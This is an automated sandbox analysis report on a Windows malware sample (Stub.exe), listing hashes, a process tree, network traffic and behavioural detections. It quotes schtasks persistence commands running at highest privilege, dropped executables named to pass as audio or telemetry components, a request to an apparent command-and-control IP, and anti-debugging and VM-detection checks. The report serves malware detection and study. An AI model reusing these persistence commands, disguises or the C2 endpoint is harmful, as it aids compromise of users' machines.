Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6402	Sept. 13, 2021, 6:13 p.m.	Sept. 13, 2021, 6:16 p.m.

Size	3.6MB
Type	PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
MD5	`3c4359296c65223a5b7acfc76e1f4ecd`
SHA256	`329903818d07ba0d9e6e77b1a334e7adc0be9ca594d122ee592257b34d4e8208`
CRC32	`F8BC3AC8`
ssdeep	`49152:bFRDWwEWVp4vzk90GOSmtQ964qvERH4EZQnghXm6ehrC50omulZQ1RKN24dIcxu3:BcwEWPUzu0CgQHiERH47ghXsW0oeCG`
Yara	PE_Header_Zero - PE File Signature IsPE32 - (no description)

Stub.exe "C:\Users\test22\AppData\Local\Temp\Stub.exe"
2232
- DriverAudioOption.exe "C:\Users\test22\AppData\Local\DriverAudioOption.exe"
  1808
  - cmd.exe "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "AudioEngine" /tr '"C:\Users\test22\AppData\Roaming\AudioEngine.exe"' & exit
    2924
    - schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "AudioEngine" /tr '"C:\Users\test22\AppData\Roaming\AudioEngine.exe"'
      2596
  - AudioEngine.exe "C:\Users\test22\AppData\Roaming\AudioEngine.exe"
    2264
    - cmd.exe "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "AudioEngine" /tr '"C:\Users\test22\AppData\Roaming\AudioEngine.exe"' & exit
      2300
      - schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "AudioEngine" /tr '"C:\Users\test22\AppData\Roaming\AudioEngine.exe"'
        2080
    - sihost32.exe "C:\Users\test22\AppData\Roaming\Microsoft\Telemetry\sihost32.exe"
      1516
- IntilizateComponentFord.exe "C:\Users\test22\AppData\Local\Temp\IntilizateComponentFord.exe"
  2860
  - cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\test22\AppData\Local\Temp\Y8lA5kjuJf.bat"
    2572
    - chcp.com chcp 65001
      2604
    - w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
      1800
    - sppsvc.exe "C:\Windows\System32\KBDHEPT\sppsvc.exe"
      2744

Name	Response	Post-Analysis Lookup
ipinfo.io	A 34.117.59.81	34.117.59.81

IP Address	Status	Action
164.124.101.2	Active	Moloch
34.117.59.81	Active	Moloch
62.109.1.30	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 192.168.56.102:49180 -> 34.117.59.81:443	2025331	ET POLICY Possible External IP Lookup Domain Observed in SNI (ipinfo. io)	Device Retrieving External IP Address Detected
TCP 192.168.56.102:49180 -> 34.117.59.81:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 34.117.59.81:443 -> 192.168.56.102:49180	2025330	ET POLICY Possible External IP Lookup SSL Cert Observed (ipinfo.io)	Device Retrieving External IP Address Detected

Suricata TLS

Flow	Issuer	Subject	Fingerprint
TLSv1 192.168.56.102:49180 34.117.59.81:443	C=US, O=Google Trust Services LLC, CN=GTS CA 1D4	CN=ipinfo.io	9b:8a:7e:73:93:70:47:e8:1f:ef:b1:b9:f4:52:8b:2f:90:2c:85:2e

Queries for the computername (38 events)

Time & API	Arguments	Status	Return
GetComputerNameW Sept. 13, 2021, 6:06 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 13, 2021, 6:06 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 13, 2021, 6:06 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 13, 2021, 6:06 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 13, 2021, 6:06 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 13, 2021, 6:06 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 13, 2021, 6:06 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 13, 2021, 6:07 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 13, 2021, 6:07 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 13, 2021, 6:07 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 13, 2021, 6:07 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 13, 2021, 6:07 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 13, 2021, 6:07 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 13, 2021, 6:07 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 13, 2021, 6:07 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 13, 2021, 6:07 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 13, 2021, 6:07 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 13, 2021, 6:07 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 13, 2021, 6:07 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 13, 2021, 6:07 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 13, 2021, 6:07 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 13, 2021, 6:07 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 13, 2021, 6:07 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 13, 2021, 6:07 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 13, 2021, 6:07 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 13, 2021, 6:07 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 13, 2021, 6:07 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 13, 2021, 6:07 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 13, 2021, 6:08 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 13, 2021, 6:08 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 13, 2021, 6:07 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 13, 2021, 6:08 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 13, 2021, 6:08 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 13, 2021, 6:08 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 13, 2021, 6:08 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 13, 2021, 6:08 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 13, 2021, 6:08 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 13, 2021, 6:08 p.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (10 events)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent Sept. 13, 2021, 6:06 p.m.			0	0
IsDebuggerPresent Sept. 13, 2021, 6:06 p.m.			0	0
IsDebuggerPresent Sept. 13, 2021, 6:06 p.m.			0	0
IsDebuggerPresent Sept. 13, 2021, 6:06 p.m.			0	0
IsDebuggerPresent Sept. 13, 2021, 6:07 p.m.			0	0
IsDebuggerPresent Sept. 13, 2021, 6:07 p.m.			0	0
IsDebuggerPresent Sept. 13, 2021, 6:07 p.m.			0	0
IsDebuggerPresent Sept. 13, 2021, 6:07 p.m.			0	0
IsDebuggerPresent Sept. 13, 2021, 6:08 p.m.			0	0
IsDebuggerPresent Sept. 13, 2021, 6:08 p.m.			0	0

Command line console output was observed (4 events)

Time & API	Arguments	Status	Return
WriteConsoleW Sept. 13, 2021, 6:07 p.m.	buffer: SUCCESS: The scheduled task "AudioEngine" has successfully been created. console_handle: 0x0000000000000007	1	1
WriteConsoleW Sept. 13, 2021, 6:07 p.m.	buffer: The batch file cannot be found. console_handle: 0x000000000000000b	1	1
WriteConsoleW Sept. 13, 2021, 6:07 p.m.	buffer: Active code page: 65001 console_handle: 0x0000000000000013	1	1
WriteConsoleW Sept. 13, 2021, 6:07 p.m.	buffer: SUCCESS: The scheduled task "AudioEngine" has successfully been created. console_handle: 0x0000000000000007	1	1

Collects information to fingerprint the system (MachineGuid, DigitalProductId, SystemBiosDate) (1 event)

registry

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx Sept. 13, 2021, 6:06 p.m.		1	1	0

One or more potentially interesting buffers were extracted, these generally contain injected code, configuration data, etc.

HTTP traffic contains suspicious features which may be indicative of malware related traffic (1 event)

suspicious_features

Connection to IP address

suspicious_request

GET http://62.109.1.30/triggers/vm_.php?IKJqpgOhe1yQhF6FuKf8qX6kg3Tm7=z7&IE=4VZ5NRqL9s1riviBamOvNiJwNmjeB1&e8f6de43394a8e2ef93b201a0d2ec922=c0280c4c3f572aabfa038560a3f515da&65ab24948c084368808c084126a043f5=QNkZTNzcDOwMWM5QGM4YzMyQmY2MGZmV2MmdDOjN2MiF2M5gDM2MGO&IKJqpgOhe1yQhF6FuKf8qX6kg3Tm7=z7&IE=4VZ5NRqL9s1riviBamOvNiJwNmjeB1

Performs some HTTP requests (1 event)

request

Allocates read-write-execute memory (usually to unpack itself) (50 out of 361 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory Sept. 13, 2021, 6:06 p.m.	process_identifier: 1808 region_size: 1048576 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000a90000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Sept. 13, 2021, 6:06 p.m.	process_identifier: 1808 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000b10000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Sept. 13, 2021, 6:06 p.m.	process_identifier: 1808 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef1291000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Sept. 13, 2021, 6:06 p.m.	process_identifier: 1808 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef192b000 process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Sept. 13, 2021, 6:06 p.m.	process_identifier: 1808 region_size: 983040 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000022b0000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Sept. 13, 2021, 6:06 p.m.	process_identifier: 1808 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000002320000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Sept. 13, 2021, 6:06 p.m.	process_identifier: 1808 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef1292000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Sept. 13, 2021, 6:06 p.m.	process_identifier: 1808 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef1292000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Sept. 13, 2021, 6:06 p.m.	process_identifier: 1808 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef1292000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Sept. 13, 2021, 6:06 p.m.	process_identifier: 1808 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef1292000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Sept. 13, 2021, 6:06 p.m.	process_identifier: 1808 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef1292000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Sept. 13, 2021, 6:06 p.m.	process_identifier: 1808 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef1292000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Sept. 13, 2021, 6:06 p.m.	process_identifier: 1808 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef1292000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Sept. 13, 2021, 6:06 p.m.	process_identifier: 1808 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef1292000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Sept. 13, 2021, 6:06 p.m.	process_identifier: 1808 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef1292000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Sept. 13, 2021, 6:06 p.m.	process_identifier: 1808 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef1292000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Sept. 13, 2021, 6:06 p.m.	process_identifier: 1808 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef1292000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Sept. 13, 2021, 6:06 p.m.	process_identifier: 1808 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef1294000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Sept. 13, 2021, 6:06 p.m.	process_identifier: 1808 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef1294000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Sept. 13, 2021, 6:06 p.m.	process_identifier: 1808 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef1294000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Sept. 13, 2021, 6:06 p.m.	process_identifier: 1808 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef1294000 process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Sept. 13, 2021, 6:06 p.m.	process_identifier: 1808 region_size: 655360 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff10000 allocation_type: 1056768 (MEM_RESERVE\|MEM_TOP_DOWN) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Sept. 13, 2021, 6:06 p.m.	process_identifier: 1808 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff10000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Sept. 13, 2021, 6:06 p.m.	process_identifier: 1808 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff10000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Sept. 13, 2021, 6:06 p.m.	process_identifier: 1808 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff20000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Sept. 13, 2021, 6:06 p.m.	process_identifier: 1808 region_size: 65536 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff00000 allocation_type: 1056768 (MEM_RESERVE\|MEM_TOP_DOWN) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Sept. 13, 2021, 6:06 p.m.	process_identifier: 1808 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff00000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Sept. 13, 2021, 6:06 p.m.	process_identifier: 1808 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe91b0a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Sept. 13, 2021, 6:06 p.m.	process_identifier: 1808 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe91b1c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Sept. 13, 2021, 6:06 p.m.	process_identifier: 1808 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe91c30000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Sept. 13, 2021, 6:06 p.m.	process_identifier: 1808 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe91bbc000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Sept. 13, 2021, 6:06 p.m.	process_identifier: 1808 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe91be6000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Sept. 13, 2021, 6:06 p.m.	process_identifier: 1808 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe91bc0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Sept. 13, 2021, 6:06 p.m.	process_identifier: 1808 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe91b0b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Sept. 13, 2021, 6:06 p.m.	process_identifier: 1808 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe91c31000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Sept. 13, 2021, 6:06 p.m.	process_identifier: 1808 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe91c32000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Sept. 13, 2021, 6:06 p.m.	process_identifier: 1808 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe91b2b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Sept. 13, 2021, 6:06 p.m.	process_identifier: 1808 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe91b02000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Sept. 13, 2021, 6:06 p.m.	process_identifier: 1808 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe91b5c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Sept. 13, 2021, 6:06 p.m.	process_identifier: 1808 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe91b2d000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Sept. 13, 2021, 6:06 p.m.	process_identifier: 1808 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe91c33000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Sept. 13, 2021, 6:06 p.m.	process_identifier: 1808 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe91c70000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Sept. 13, 2021, 6:06 p.m.	process_identifier: 1808 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe91c34000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Sept. 13, 2021, 6:06 p.m.	process_identifier: 1808 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe91b1a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Sept. 13, 2021, 6:06 p.m.	process_identifier: 2860 region_size: 2359296 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000007c0000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Sept. 13, 2021, 6:06 p.m.	process_identifier: 2860 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000980000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Sept. 13, 2021, 6:06 p.m.	process_identifier: 2860 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef1291000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Sept. 13, 2021, 6:06 p.m.	process_identifier: 2860 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef192b000 process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Sept. 13, 2021, 6:06 p.m.	process_identifier: 2860 region_size: 1638400 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000002100000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Sept. 13, 2021, 6:06 p.m.	process_identifier: 2860 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000002210000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1

Queries the disk size which could be used to detect virtual machine with small fixed size or dynamic allocation (2 events)

Time & API	Arguments	Status	Return	Repeated
GetDiskFreeSpaceExW Sept. 13, 2021, 6:06 p.m.	total_number_of_free_bytes: 10926993408 free_bytes_available: 10926993408 root_path: C:\ total_number_of_bytes: 34252779520	1	1	0
GetDiskFreeSpaceExW Sept. 13, 2021, 6:08 p.m.	total_number_of_free_bytes: 10914975744 free_bytes_available: 10914975744 root_path: C:\ total_number_of_bytes: 34252779520	1	1	0

Looks up the external IP address (1 event)

domain

ipinfo.io

Creates executable files on the filesystem (4 events)

file	C:\Users\test22\AppData\Local\DriverAudioOption.exe
file	C:\Users\test22\AppData\Local\Temp\Y8lA5kjuJf.bat
file	C:\Users\test22\AppData\Local\Temp\IntilizateComponentFord.exe
file	C:\Users\test22\AppData\Roaming\Microsoft\Telemetry\sihost32.exe

Creates a suspicious process (4 events)

cmdline	cmd /c schtasks /create /f /sc onlogon /rl highest /tn "AudioEngine" /tr '"C:\Users\test22\AppData\Roaming\AudioEngine.exe"' & exit
cmdline	schtasks /create /f /sc onlogon /rl highest /tn "AudioEngine" /tr '"C:\Users\test22\AppData\Roaming\AudioEngine.exe"'
cmdline	"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "AudioEngine" /tr '"C:\Users\test22\AppData\Roaming\AudioEngine.exe"' & exit
cmdline	"C:\Windows\System32\cmd.exe" /C "C:\Users\test22\AppData\Local\Temp\Y8lA5kjuJf.bat"

Drops a binary and executes it (4 events)

file	C:\Users\test22\AppData\Local\DriverAudioOption.exe
file	C:\Users\test22\AppData\Local\Temp\IntilizateComponentFord.exe
file	C:\Users\test22\AppData\Local\Temp\Y8lA5kjuJf.bat
file	C:\Users\test22\AppData\Roaming\Microsoft\Telemetry\sihost32.exe

Drops an executable to the user AppData folder (1 event)

file	C:\Users\test22\AppData\Local\Temp\IntilizateComponentFord.exe

A process created a hidden window (7 events)

Time & API	Arguments	Status	Return
CreateProcessInternalW Sept. 13, 2021, 6:13 p.m.	thread_identifier: 2492 thread_handle: 0x00000038 process_identifier: 1808 current_directory: filepath: C:\Users\test22\AppData\Local\DriverAudioOption.exe track: 1 command_line: filepath_r: C:\Users\test22\AppData\Local\DriverAudioOption.exe stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 0 process_handle: 0x0000003c	1	1
CreateProcessInternalW Sept. 13, 2021, 6:13 p.m.	thread_identifier: 2864 thread_handle: 0x00000038 process_identifier: 2860 current_directory: filepath: C:\Users\test22\AppData\Local\Temp\IntilizateComponentFord.exe track: 1 command_line: filepath_r: C:\Users\test22\AppData\Local\Temp\IntilizateComponentFord.exe stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 0 process_handle: 0x0000003c	1	1
ShellExecuteExW Sept. 13, 2021, 6:06 p.m.	show_type: 0 filepath_r: cmd parameters: /c schtasks /create /f /sc onlogon /rl highest /tn "AudioEngine" /tr '"C:\Users\test22\AppData\Roaming\AudioEngine.exe"' & exit filepath: cmd	1	1
ShellExecuteExW Sept. 13, 2021, 6:07 p.m.	show_type: 0 filepath_r: C:\Users\test22\AppData\Roaming\AudioEngine.exe parameters: filepath: C:\Users\test22\AppData\Roaming\AudioEngine.exe	1	1
ShellExecuteExW Sept. 13, 2021, 6:07 p.m.	show_type: 0 filepath_r: C:\Users\test22\AppData\Local\Temp\Y8lA5kjuJf.bat parameters: filepath: C:\Users\test22\AppData\Local\Temp\Y8lA5kjuJf.bat	1	1
ShellExecuteExW Sept. 13, 2021, 6:07 p.m.	show_type: 0 filepath_r: cmd parameters: /c schtasks /create /f /sc onlogon /rl highest /tn "AudioEngine" /tr '"C:\Users\test22\AppData\Roaming\AudioEngine.exe"' & exit filepath: cmd	1	1
ShellExecuteExW Sept. 13, 2021, 6:08 p.m.	show_type: 0 filepath_r: C:\Users\test22\AppData\Roaming\Microsoft\Telemetry\sihost32.exe parameters: filepath: C:\Users\test22\AppData\Roaming\Microsoft\Telemetry\sihost32.exe	1	1

Checks adapter addresses which can be used to detect virtual network interfaces (1 event)

Time & API	Arguments	Status	Return	Repeated
GetAdaptersAddresses Sept. 13, 2021, 6:08 p.m.	flags: 15 family: 0		111	0

The binary likely contains encrypted or compressed data indicative of a packer (2 events)

section

